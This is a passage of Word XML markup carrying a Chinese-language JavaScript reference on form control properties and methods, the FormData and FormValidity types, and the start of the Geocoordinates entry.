      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来说，</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值指定元素的类型，如果对应的＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签没有指定</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>属性则为</w:t>
      </w:r>
      <w:r>
        <w:t>"text"</w:t>
      </w:r>
      <w:r>
        <w:t>。对＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>＞以及</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>元素来说，</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>分别为</w:t>
      </w:r>
      <w:r>
        <w:t>"button"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"select-one"</w:t>
      </w:r>
      <w:r>
        <w:t>（或</w:t>
      </w:r>
      <w:r>
        <w:t>"select-m</w:t>
      </w:r>
      <w:r>
        <w:t>ultiple"</w:t>
      </w:r>
      <w:r>
        <w:t>，如果设置了</w:t>
      </w:r>
      <w:r>
        <w:t>multiple</w:t>
      </w:r>
      <w:r>
        <w:t>属性）以及</w:t>
      </w:r>
      <w:r>
        <w:t>"textarea"</w:t>
      </w:r>
      <w:r>
        <w:t>。对＜</w:t>
      </w:r>
      <w:r>
        <w:t>fieldset</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来说，</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"fieldset"</w:t>
      </w:r>
      <w:r>
        <w:t>，对＜</w:t>
      </w:r>
      <w:r>
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来说</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"output"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string validationMessage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果控件是有效的或不受验证控制，这个属性将为空字符串。否则，这个属性包含一个说明为什么用户的输入无效的本地化字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly FormValidity validity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性指代一个对象，该对象指出用户对当前控件的输入是否为有效，以及</w:t>
      </w:r>
      <w:r>
        <w:t>如果无效的话为什么无效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每个表单控件都有一个字符串值</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>，将用于提交表单。对文本输入控件而言，这个值即是用户的输入。对按钮而言，这个值就是对应的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML value</w:t>
      </w:r>
      <w:r>
        <w:t>属性。对</w:t>
      </w:r>
      <w:r>
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:t>元素而言，这个属性类似于自</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>继承的</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>Fieldset</w:t>
      </w:r>
      <w:r>
        <w:t>元素没有这个属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean willValidate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前控件参与表单验证则本属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</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表单控件定义了下面这些事件处理程序属性。也可以通过所有</w:t>
      </w:r>
      <w:r>
        <w:t>Element()</w:t>
      </w:r>
      <w:r>
        <w:t>都实现的</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来注册事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251764736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4045788" cy="1651958"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="109" name="00109.jpeg" descr="00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09.jpeg" descr="00109.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4045788" cy="1651958"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean checkValidity()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果控件有效（或者它不参与验证）则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。否则，本方法将在对应控件上触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>invalid</w:t>
      </w:r>
      <w:r>
        <w:t>事件并返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void setCustomValidity(string error)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>是一个非空字符串，本方法将把该控件标记为无效，并将在向用户报告该元素的无效性时将</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>作为本地化消息显示。如</w:t>
      </w:r>
      <w:r>
        <w:t>果</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>是空字符串，之前设置的</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>字符串将删除，同时该控件将认为是有效的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="827" w:name="FormData"/>
      <w:r>
        <w:t>FormData</w:t>
      </w:r>
      <w:bookmarkEnd w:id="827"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一次</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP mutilpart/form-data</w:t>
      </w:r>
      <w:r>
        <w:t>请求体的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>FormData</w:t>
      </w:r>
      <w:r>
        <w:t>类型是</w:t>
      </w:r>
      <w:r>
        <w:t>XML Http Request Level 2(XHR 2)</w:t>
      </w:r>
      <w:r>
        <w:t>的一个特性，该特性让使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:t>multipart/form-data</w:t>
      </w:r>
      <w:r>
        <w:t>编码的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP PUT</w:t>
      </w:r>
      <w:r>
        <w:t>请求更简单。如果想在一个请求中上传多个</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象，还需要复合编码（</w:t>
      </w:r>
      <w:r>
        <w:t>multipart encoding</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>使用构造函数创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>FormData</w:t>
      </w:r>
      <w:r>
        <w:t>对象，然后使用</w:t>
      </w:r>
      <w:r>
        <w:t>append()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来为它添加名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对。在添加完所有的请求内容后，就可以将该</w:t>
      </w:r>
      <w:r>
        <w:t>FormData</w:t>
      </w:r>
      <w:r>
        <w:t>传入一个</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>send()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>new FormData()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个无参数的构造函数返回一个空</w:t>
      </w:r>
      <w:r>
        <w:t>FormData</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void append(string name,any value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法添加指定</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>的内容到</w:t>
      </w:r>
      <w:r>
        <w:t>FormData</w:t>
      </w:r>
      <w:r>
        <w:t>中。参数</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>可以是一个字符串或者一个</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>（别忘了</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>对象也是</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="828" w:name="FormValidity"/>
      <w:r>
        <w:t>FormValidity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="828"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表单控件的有效性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>validity</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代一个</w:t>
      </w:r>
      <w:r>
        <w:t>FormValidity</w:t>
      </w:r>
      <w:r>
        <w:t>对象，该对象是对应控件的有效状态的一个实时表示。如果</w:t>
      </w:r>
      <w:r>
        <w:t>valid</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，表明对应控件无效，此时应该至少有一个别的属性为</w:t>
      </w:r>
      <w:r>
        <w:t>ture</w:t>
      </w:r>
      <w:r>
        <w:t>来指出验证错误（一个或多个）的性质。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>验证是一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>特性，在写作本书的时候还没有广泛实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean customError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一段脚本在当前元素上调用</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl.setCustomValidity</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean patternMismatch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>输入与</w:t>
      </w:r>
      <w:r>
        <w:t>pattern</w:t>
      </w:r>
      <w:r>
        <w:t>正则表达式不匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean rangeOverfow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>输入太大了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean rangeUnderfow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>输入太小了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean stepMismatch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>输入与指定</w:t>
      </w:r>
      <w:r>
        <w:t>step</w:t>
      </w:r>
      <w:r>
        <w:t>不匹配。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean tooLong</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>输入太长了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean typeMismatch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>输入类型有误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">readonly </w:t>
      </w:r>
      <w:r>
        <w:t>boolean valid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果本属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则对应表单控件是有效的，其他属性都将为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。如果本属性为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，则对应表单控件无效，其他属性至少有一个为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean valueMissing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>必填的表单元素为空。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="829" w:name="Geocoordinates"/>
      <w:r>
        <w:t>Geocoordinates</w:t>
      </w:r>
      <w:bookmarkEnd w:id="829"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>地理位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本类型的对象表示地球表面的一个位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly double accuracy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>纬度（</w:t>
      </w:r>
      <w:r>
        <w:t>latitude</w:t>
      </w:r>
      <w:r>
        <w:t>）与经度（</w:t>
      </w:r>
      <w:r>
        <w:t>longitude</w:t>
      </w:r>
      <w:r>
        <w:t>）值的精确度，单位为米。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">readonly double </w:t>
      </w:r>
      <w:r>
        <w:t>altitude</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>海拔高度，单位为米，如果不可用则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly double altitudeAccuracy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>高度（</w:t>
      </w:r>
      <w:r>
        <w:t>altitude</w:t>
      </w:r>
      <w:r>
        <w:t>）属性的精确度，单位为米。如果</w:t>
      </w:r>
      <w:r>
        <w:t>altitude</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:t>altitudeAccuracy</w:t>
      </w:r>
      <w:r>
        <w:t>也为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
